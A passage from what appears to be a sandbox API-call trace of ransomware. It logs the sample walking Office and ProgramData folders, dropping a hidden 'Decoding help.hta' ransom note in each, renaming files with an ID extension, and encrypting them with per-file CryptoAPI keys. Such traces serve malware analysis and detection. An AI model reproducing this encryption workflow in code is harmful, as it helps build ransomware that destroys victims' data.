returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*.*" [0058.219] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*.*") returned 64 [0058.219] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\", lpString2="VSTOInstaller.config" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" [0058.219] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" [0058.219] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.[ID]g9uZrLhJaygpwRm1[ID]" [0058.219] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0062.511] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOInstaller.config.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.config.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e0 [0062.511] CreateFileMappingA (hFile=0x6e0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xe8c [0062.512] CryptAcquireContextA (phProv=0x1b55fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 717 os_tid = 0xf7c [0054.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\*.*", lpFindFileData=0x1b65fd30 | out: lpFindFileData=0x1b65fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7089b290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6718f0 [0056.115] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.115] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x1b65fd30 | out: lpFindFileData=0x1b65fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7089b290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7089b290, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.115] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.115] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.115] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x1b65fd30 | out: lpFindFileData=0x1b65fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f046d00, ftCreationTime.dwHighDateTime=0x1bd9a89, ftLastAccessTime.dwLowDateTime=0x65f01310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6f046d00, ftLastWriteTime.dwHighDateTime=0x1bd9a89, nFileSizeHigh=0x0, nFileSizeLow=0xf77, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0143743.GIF", cAlternateFileName="")) returned 1 [0056.116] lstrcpyW (in: lpString1=0x114850b8, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\*.*" [0056.116] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\*.*") returned 71 [0056.116] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Decoding help.hta" [0056.116] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\decoding help.hta")) returned 0xffffffff [0056.116] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbb4 [0060.474] WriteFile (in: hFile=0xbb4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1b65fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1b65fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.590] CloseHandle (hObject=0xbb4) returned 1 [0061.590] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 718 os_tid = 0xf80 [0054.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\*.*", lpFindFileData=0x1b75fd30 | out: lpFindFileData=0x1b75fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db6b8 [0056.857] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.857] FindNextFileW (in: hFindFile=0x5db6b8, lpFindFileData=0x1b75fd30 | out: lpFindFileData=0x1b75fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.857] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.857] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.857] FindNextFileW (in: hFindFile=0x5db6b8, lpFindFileData=0x1b75fd30 | out: lpFindFileData=0x1b75fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x130a0400, ftCreationTime.dwHighDateTime=0x1c07b1f, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x130a0400, ftLastWriteTime.dwHighDateTime=0x1c07b1f, nFileSizeHigh=0x0, nFileSizeLow=0x4c438, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE10.MML", cAlternateFileName="")) returned 1 [0056.857] lstrcpyW (in: lpString1=0x244d8180, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\*.*" [0056.857] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\*.*") returned 61 [0056.857] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\Decoding help.hta" [0056.857] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\decoding help.hta")) returned 0xffffffff [0056.858] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbc8 [0058.398] WriteFile (in: hFile=0xbc8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1b75fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1b75fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.400] CloseHandle (hObject=0xbc8) returned 1 [0058.400] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.400] lstrcmpiW (lpString1="Decoding help.hta", lpString2="OFFICE10.MML") returned -1 [0058.400] lstrlenW (lpString="OFFICE10.MML") returned 12 [0058.400] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\*.*" [0058.400] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\*.*") returned 61 [0058.400] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\", lpString2="OFFICE10.MML" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" [0058.400] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" [0058.400] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML.[ID]g9uZrLhJaygpwRm1[ID]" [0058.400] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.401] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbc8 [0058.401] CreateFileMappingA (hFile=0xbc8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xbcc [0058.401] CryptAcquireContextA (in: phProv=0x1b75fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1b75fcec*=0x2aac5de0) returned 1 [0060.210] CryptGenKey (in: hProv=0x2aac5de0, Algid=0x6610, dwFlags=0x1, phKey=0x1b75fce8 | out: phKey=0x1b75fce8*=0x5fca5e0) returned 1 [0060.211] CryptExportKey (in: hKey=0x5fca5e0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1b75fbe4, pdwDataLen=0x1b75fce4 | out: pbData=0x1b75fbe4*, pdwDataLen=0x1b75fce4*=0x2c) returned 1 [0060.211] MapViewOfFile (hFileMappingObject=0xbcc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4c420) returned 0xfc00000 [0065.159] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b75fbe4*, pdwDataLen=0x1b75fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1b75fbe4*, pdwDataLen=0x1b75fcf8*=0x100) returned 1 [0065.160] CryptEncrypt (hKey=0x5fca5e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xfc00000, pdwDataLen=0x1b75fce4*=0x4c420, dwBufLen=0x4c420) Thread: id = 719 os_tid = 0xf84 [0054.476] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\*.*", lpFindFileData=0x1c69fd30 | out: lpFindFileData=0x1c69fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbcce4400, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbcce4400, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8850 [0057.530] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.530] FindNextFileW (in: hFindFile=0x5d8850, lpFindFileData=0x1c69fd30 | out: lpFindFileData=0x1c69fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbcce4400, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbcce4400, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.954] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.954] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.954] FindNextFileW (in: hFindFile=0x5d8850, lpFindFileData=0x1c69fd30 | out: lpFindFileData=0x1c69fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3475600, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x51767f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3475600, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0x3da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AUTOSHAP.DLL", cAlternateFileName="")) returned 1 [0058.954] lstrcpyW (in: lpString1=0x2a7a0418, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\*.*" [0058.954] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\*.*") returned 65 [0058.954] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Decoding help.hta" [0058.954] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\decoding help.hta")) returned 0xffffffff [0059.317] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7a0 [0060.627] WriteFile (in: hFile=0x7a0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1c69fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1c69fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.628] CloseHandle (hObject=0x7a0) returned 1 [0060.628] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.859] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AUTOSHAP.DLL") returned 1 [0060.859] lstrlenW (lpString="AUTOSHAP.DLL") returned 12 [0060.859] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\*.*" [0060.859] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\*.*") returned 65 [0060.859] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\", lpString2="AUTOSHAP.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL" [0060.859] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL" [0060.859] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0060.859] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\autoshap.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\autoshap.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.860] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\autoshap.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb14 [0060.860] CreateFileMappingA (hFile=0xb14, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb08 [0060.860] CryptAcquireContextA (phProv=0x1c69fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 720 os_tid = 0xf88 [0054.477] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpFindFileData=0x1c79fd30 | out: lpFindFileData=0x1c79fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8350 [0055.671] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.671] FindNextFileW (in: hFindFile=0x5d8350, lpFindFileData=0x1c79fd30 | out: lpFindFileData=0x1c79fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.671] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.671] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.671] FindNextFileW (in: hFindFile=0x5d8350, lpFindFileData=0x1c79fd30 | out: lpFindFileData=0x1c79fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f07a66f, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f07a66f, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76b3ce5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x0, cFileName="background.png", cAlternateFileName="")) returned 1 [0055.753] lstrcpyW (in: lpString1=0x2a8b07f8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" [0055.753] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned 91 [0055.753] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta" [0055.753] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\decoding help.hta")) returned 0xffffffff [0055.753] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0059.210] WriteFile (in: hFile=0x3ec, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1c79fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1c79fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.505] CloseHandle (hObject=0x3ec) returned 1 [0061.602] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 721 os_tid = 0xf8c [0054.477] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpFindFileData=0x1c89fd30 | out: lpFindFileData=0x1c89fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, 